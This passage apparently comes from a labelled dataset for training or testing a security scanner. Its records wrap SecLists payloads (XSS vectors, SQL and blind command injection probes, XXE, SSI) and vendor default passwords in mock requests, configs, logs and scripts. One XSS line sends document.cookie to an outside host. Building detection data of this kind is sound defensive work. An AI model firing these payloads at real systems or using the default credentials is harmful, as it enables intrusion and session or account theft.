"text": "<input type=\"text\" value=\"<form action=javascript:alert(1)><input type=submit>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<form action=javascript:alert(1)><input type=submit>", "injection_type": "XSS"}}]} {"id": "seclists_02752", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Nokia,Telecom,Telecom,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Nokia,Telecom,Telecom,"}}]} {"id": "seclists_02753", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: ha.ckers.org HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_02754", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Nortel,trmcnfg,trmcnfg,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Nortel,trmcnfg,trmcnfg,"}}]} {"id": "seclists_02755", "source": "seclists", "source_license": "MIT", "text": "password: Xyplex,<BLANK>,system,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Xyplex,<BLANK>,system,"}}]} {"id": "seclists_02756", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2527%0A%20str%3D%24%28echo%20WYAQUW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%0A%20str%3D%24%28echo%20WYAQUW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02757", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><plaintext onfocusout=alert(1) tabindex=1 id=x></plaintext><input autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<plaintext onfocusout=alert(1) tabindex=1 id=x></plaintext><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02758", "source": "seclists", "source_license": "MIT", "text": "filename=%27||echo%20ULPNTA$((21%2B48))$(echo%20ULPNTA)ULPNTA", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27||echo%20ULPNTA$((21%2B48))$(echo%20ULPNTA)ULPNTA", "injection_type": "cmd"}}]} {"id": "seclists_02759", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ' --", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' --", "injection_type": "cmd"}}]} {"id": "seclists_02760", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf 'hi' or 'x'='x';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'hi' or 'x'='x';", "injection_type": "cmd"}}]} {"id": "seclists_02761", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<marquee loop=1 width=0 onfinish=alert(1)> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<marquee loop=1 width=0 onfinish=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_02762", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2522%0A%20str%3D%24%28echo%20BHVRST%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%0A%20str%3D%24%28echo%20BHVRST%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "injection_type": "cmd"}}]} {"id": "seclists_02763", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FEGQZM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FEGQZM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//", "injection_type": "cmd"}}]} {"id": "seclists_02764", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<video draggable=\"true\" ondragend=\"alert(1)\">test</video>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<video draggable=\"true\" ondragend=\"alert(1)\">test</video>", "injection_type": "XSS"}}]} {"id": "seclists_02765", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin') or '1'='1'# HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin') or '1'='1'#", "injection_type": "SQL"}}]} {"id": "seclists_02766", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s", "injection_type": "cmd"}}]} {"id": "seclists_02767", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"&echo$IFSGFEHZK$((68%2B85))$(echo$IFSGFEHZK)GFEHZK", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"&echo$IFSGFEHZK$((68%2B85))$(echo$IFSGFEHZK)GFEHZK", "injection_type": "cmd"}}]} {"id": "seclists_02768", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '%3Becho$IFSMWZRJO$((7%2B81))$(echo$IFSMWZRJO)MWZRJO&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%3Becho$IFSMWZRJO$((7%2B81))$(echo$IFSMWZRJO)MWZRJO&", "injection_type": "cmd"}}]} {"id": "seclists_02769", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<br id=x tabindex=1 onbeforeactivate=alert(1)></br> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<br id=x tabindex=1 onbeforeactivate=alert(1)></br>", "injection_type": "XSS"}}]} {"id": "seclists_02770", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%3cscript%3ealert(\"XSS\");%3c/script%3e HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3cscript%3ealert(\"XSS\");%3c/script%3e", "injection_type": "cmd"}}]} {"id": "seclists_02771", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<br><br><br><br><br><br><br><br><br><br>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<br><br><br><br><br><br><br><br><br><br>", "injection_type": "XSS"}}]} {"id": "seclists_02772", "source": "seclists", "source_license": "MIT", "text": "filename=%0A%20str%3D%24%28echo%20DMZPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20DMZPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_02773", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"OBJECT w/Embedded XSS\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "OBJECT w/Embedded XSS", "injection_type": "XSS"}}]} {"id": "seclists_02774", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=M Technology,<N/A>,mMmM,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "M Technology,<N/A>,mMmM,"}}]} {"id": "seclists_02775", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%20%5B%208%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%208%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20", "injection_type": "cmd"}}]} {"id": "seclists_02776", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"http://example.com:80\" >]><foo>&xxe;</foo>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"http://example.com:80\" >]><foo>&xxe;</foo>", "injection_type": "XXE"}}]} {"id": "seclists_02777", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<summary draggable=\"true\" ondragleave=\"alert(1)\">test</summary> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<summary draggable=\"true\" ondragleave=\"alert(1)\">test</summary>", "injection_type": "XSS"}}]} {"id": "seclists_02778", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27%26echo$IFSUEVCYJ$((85%2B1))$(echo$IFSUEVCYJ)UEVCYJ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%26echo$IFSUEVCYJ$((85%2B1))$(echo$IFSUEVCYJ)UEVCYJ", "injection_type": "cmd"}}]} {"id": "seclists_02779", "source": "seclists", "source_license": "MIT", "text": "filename=/,%ENV,/", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/,%ENV,/", "injection_type": "cmd"}}]} {"id": "seclists_02780", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22", "injection_type": "cmd"}}]} {"id": "seclists_02781", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Oracle,QDBA,QDBA,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,QDBA,QDBA,"}}]} {"id": "seclists_02782", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Avaya,root,ROOT500,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Avaya,root,ROOT500,"}}]} {"id": "seclists_02783", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Hewlett-Packard,HELLO,MANAGER.SYS,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Hewlett-Packard,HELLO,MANAGER.SYS,"}}]} {"id": "seclists_02784", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Evade Regex Filter 1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Evade Regex Filter 1", "injection_type": "XSS"}}]} {"id": "seclists_02785", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"date_local\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"date_local\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02786", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);", "injection_type": "XSS"}}]} {"id": "seclists_02787", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\">", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\">", "injection_type": "XXE"}}]} {"id": "seclists_02788", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'admin\" or \"1\"=\"1\"/*';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\" or \"1\"=\"1\"/*", "injection_type": "SQL"}}]} {"id": "seclists_02789", "source": "seclists", "source_license": "MIT", "text": "filename=<IMG SRC=\" &#14; javascript:alert('XSS');\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=\" &#14; javascript:alert('XSS');\">", "injection_type": "cmd"}}]} {"id": "seclists_02790", "source": "seclists", "source_license": "MIT", "text": "password: IBM,VTAM,VTAM,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,VTAM,VTAM,"}}]} {"id": "seclists_02791", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:terry1@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "terry1"}}]} {"id": "seclists_02792", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02793", "source": "seclists", "source_license": "MIT", "text": "filename=;/usr/bin/id\\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";/usr/bin/id\\n", "injection_type": "cmd"}}]} {"id": "seclists_02794", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=\" or benchmark(10000000,MD5(1))# HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or benchmark(10000000,MD5(1))#", "injection_type": "SQL"}}]} {"id": "seclists_02795", "source": "seclists", "source_license": "MIT", "text": "filename='&echo%20AGXFEH$((96%2B88))$(echo%20AGXFEH)AGXFEH\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'&echo%20AGXFEH$((96%2B88))$(echo%20AGXFEH)AGXFEH\"", "injection_type": "cmd"}}]} {"id": "seclists_02796", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<div draggable=\"true\" contenteditable>drag me</div><rtc ondrop=alert(1) contenteditable>drop here</rtc> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><rtc ondrop=alert(1) contenteditable>drop here</rtc>", "injection_type": "XSS"}}]} {"id": "seclists_02797", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<aside onmousemove=\"alert(1)\">test</aside>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<aside onmousemove=\"alert(1)\">test</aside>", "injection_type": "XSS"}}]} {"id": "seclists_02798", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>*/alert(1)</script><script>/*</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*/alert(1)</script><script>/*", "injection_type": "XSS"}}]} {"id": "seclists_02799", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Gericom,Administrator,<BLANK>,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Gericom,Administrator,<BLANK>,"}}]} {"id": "seclists_02800", "source": "seclists", "source_license": "MIT", "text": "filename=' UNION SELECT", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' UNION SELECT", "injection_type": "cmd"}}]} {"id": "seclists_02801", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>", "injection_type": "cmd"}}]} {"id": "seclists_02802", "source": "seclists", "source_license": "MIT", "text": "password: caught\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "caught"}}]} {"id": "seclists_02803", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_ua_cpu\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_ua_cpu\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02804", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'a' or 1=1--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a' or 1=1--", "injection_type": "SQL"}}]} {"id": "seclists_02805", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TABXYH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TABXYH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20", "injection_type": "cmd"}}]} {"id": "seclists_02806", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \"<xml ID=I><X><C><![CDATA[<IMG SRC=\"\"javas]]><![CDATA[cript:alert('XSS');\"\">]]>\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"<xml ID=I><X><C><![CDATA[<IMG SRC=\"\"javas]]><![CDATA[cript:alert('XSS');\"\">]]>\"", "injection_type": "cmd"}}]} {"id": "seclists_02807", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_02808", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: STYLE w/background</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: STYLE w/background", "injection_type": "XSS"}}]} {"id": "seclists_02809", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%3B%20str%3D%24%28echo%20OIPHJR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20OIPHJR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_02810", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><body onhashchange=alert(1)><a href=#x>click this!#x</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body onhashchange=alert(1)><a href=#x>click this!#x", "injection_type": "XSS"}}]} {"id": "seclists_02811", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '&echo%20WHTJDF$((87%2B5))$(echo%20WHTJDF)WHTJDF%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'&echo%20WHTJDF$((87%2B5))$(echo%20WHTJDF)WHTJDF%7C", "injection_type": "cmd"}}]} {"id": "seclists_02812", "source": "seclists", "source_license": "MIT", "text": "username=0&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "0", "injection_type": "SQL"}}]} {"id": "seclists_02813", "source": "seclists", "source_license": "MIT", "text": "password: Motorola,service,smile,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Motorola,service,smile,"}}]} {"id": "seclists_02814", "source": "seclists", "source_license": "MIT", "text": "username=%2A%7C&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2A%7C", "injection_type": "SQL"}}]} {"id": "seclists_02815", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><x OnXxx=1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x OnXxx=1", "injection_type": "XSS"}}]} {"id": "seclists_02816", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: '];a=eval;b=alert;a(b(15));//\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: '];a=eval;b=alert;a(b(15));//", "injection_type": "XSS"}}]} {"id": "seclists_02817", "source": "seclists", "source_license": "MIT", "text": "username=admin\"or 1=1 or \"\"=\"&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\"or 1=1 or \"\"=\"", "injection_type": "SQL"}}]} {"id": "seclists_02818", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<var onbeforepaste=\"alert(1)\" contenteditable>test</var> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<var onbeforepaste=\"alert(1)\" contenteditable>test</var>", "injection_type": "XSS"}}]} {"id": "seclists_02819", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Obfuscated name trigger for Firefox HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Obfuscated name trigger for Firefox", "injection_type": "XSS"}}]} {"id": "seclists_02820", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or (EXISTS)';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or (EXISTS)", "injection_type": "SQL"}}]} {"id": "seclists_02821", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'declare @q nvarchar (4000) select @q =';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "declare @q nvarchar (4000) select @q =", "injection_type": "SQL"}}]} {"id": "seclists_02822", "source": "seclists", "source_license": "MIT", "text": "password: BizDesign,Admin,ImageFolio,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "BizDesign,Admin,ImageFolio,"}}]} {"id": "seclists_02823", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<element onbeforepaste=\"alert(1)\" contenteditable>test</element>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<element onbeforepaste=\"alert(1)\" contenteditable>test</element>", "injection_type": "XSS"}}]} {"id": "seclists_02824", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20JGUTOJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26", "injection_type": "cmd"}}]} {"id": "seclists_02825", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7Cecho$IFSUXKUGT$((68%2B89))$(echo$IFSUXKUGT)UXKUGT%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7Cecho$IFSUXKUGT$((68%2B89))$(echo$IFSUXKUGT)UXKUGT%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02826", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=!' HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "!'", "injection_type": 